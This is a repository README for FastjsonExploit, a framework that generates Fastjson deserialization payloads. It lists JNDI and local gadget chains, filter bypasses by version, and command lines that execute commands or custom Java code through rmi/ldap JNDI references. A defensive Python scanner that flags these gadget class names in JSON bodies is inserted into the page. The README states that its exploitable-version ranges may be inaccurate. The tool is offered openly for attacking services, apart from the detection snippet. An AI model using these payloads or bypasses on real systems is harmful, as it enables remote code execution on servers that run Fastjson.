Fastjson vulnerability rapid exploitation framework
Latest commit 665b6f6 Jul 20, 2019

FastjsonExploit | Fastjson Vulnerability Rapid Exploitation Framework

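0x01 Introduction

FastjsonExploit is a framework for rapidly exploiting Fastjson vulnerabilities. Its main features are:

  1. Generate an exploit payload with one command and start all of the exploitation environments.
  2. Manage the various Fastjson payloads (the goal is of course to collect them all; currently 6 classes, 11 exploits and bypasses in total).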

0x02 Building

Requires Java 1.7+ and Maven 3.x+

mvn clean package -DskipTests

0x03 Usage



.---- -. -. .  .   .
   ( .',----- - - ' '
    \_/      ;--:-\         __--------------------__
   __U__n_^_''__[. |ooo___  | |_!_||_!_||_!_||_!_| |
 c(_ ..(_ ..(_ ..( /,,,,,,] | |___||___||___||___| |
 ,_\___________'_|,L______],|______________________|
/;_(@)(@)==(@)(@)   (o)(o)      (o)^(o)--(o)^(o)

FastjsonExploit is a Fastjson library vulnerability exploit framework
                Author:c0ny1<root@gv7.me>


Usage: java -jar Fastjson-[version]-all.jar [payload] [option] [command]
Exp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit "cmd:calc"
Exp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit "code:custom_code.java"
Exp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "cmd:calc"
Exp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "code:custom_code.java"

Available payload types:
    Payload                PayloadType VulVersion      Dependencies                                      
    -------                ----------- ----------      ------------                                      
    BasicDataSource1       local       1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
    BasicDataSource2       local       1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
    JdbcRowSetImpl1        jndi        1.2.2.1-1.2.2.4                                                   
    JdbcRowSetImpl2        jndi        1.2.2.1-1.2.4.1 Fastjson 1.2.41 bypass                            
    JdbcRowSetImpl3        jndi        1.2.2.1-1.2.4.3 Fastjson 1.2.43 bypass                            
    JdbcRowSetImpl4        jndi        1.2.2.1-1.2.4.2 Fastjson 1.2.42 bypass                            
    JdbcRowSetImpl5        jndi        1.2.2.1-1.2.4.7 Fastjson 1.2.47 bypass                            
    JndiDataSourceFactory1 jndi        1.2.2.1-1.2.2.4 ibatis-core:3.0                                   
    SimpleJndiBeanFactory1 jndi        1.2.2.2-1.2.2.4 spring-context:4.3.7.RELEASE                      
    TemplatesImpl1         local       1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)   
    TemplatesImpl2         local       1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)  
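
A defensive check built on the payload table above, as an added example that is not part of FastjsonExploit: Fastjson chooses the class to instantiate from the `@type` key of the JSON input, so this Python code flags request bodies whose `@type` value names one of the listed classes. The function names, the sample bodies and the `com.example` / `org.example` class names are constructed for illustration.

```python
import json

# Simple class names from the payload table above. Matching is by substring,
# so the package prefix and any characters wrapped around the name are ignored.
GADGET_NAMES = ("BasicDataSource", "JdbcRowSetImpl", "JndiDataSourceFactory",
                "SimpleJndiBeanFactory", "TemplatesImpl")


def type_values(node):
    """Yield every string stored under an "@type" key, at any nesting depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "@type" and isinstance(value, str):
                yield value
            else:
                yield from type_values(value)
    elif isinstance(node, list):
        for item in node:
            yield from type_values(item)


def scan_body(body):
    """Return sorted findings: 'gadget:<name>', 'autotype:<class>' or 'raw:<marker>'."""
    try:
        doc = json.loads(body)  # also decodes string escapes inside key names
    except ValueError:
        # Fastjson accepts input a strict parser rejects, so fall back to a
        # plain text search instead of treating the body as clean.
        return sorted("raw:" + m for m in ("@type",) + GADGET_NAMES if m in body)
    findings = set()
    for value in type_values(doc):
        hits = [name for name in GADGET_NAMES if name in value]
        findings.update("gadget:" + name for name in hits)
        if not hits:
            findings.add("autotype:" + value)  # not in the table, still review
    return sorted(findings)


# Constructed request bodies (not captured traffic); values are placeholders.
SAMPLES = {
    "benign": '{"user": "alice", "items": [1, 2]}',
    "nested": '{"order": {"meta": [{"@type": "com.sun.rowset.JdbcRowSetImpl", "note": "constructed"}]}}',
    "escaped_key": r'{"\u0040type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"}',
    "other_type": '{"@type": "com.example.Order", "id": 7}',
    "lenient": "{'@type': 'org.example.BasicDataSource'}",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan_body(body))
```

A non-empty result on an endpoint that is not meant to accept typed JSON is worth reviewing whatever Fastjson version is deployed, since the version ranges in the table are not guaranteed to be accurate.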

0x04 Notice

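  • The Fastjson versions that the help output lists as exploitable for each payload are not necessarily correct. They will be corrected after further testing!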

0x05 Reference
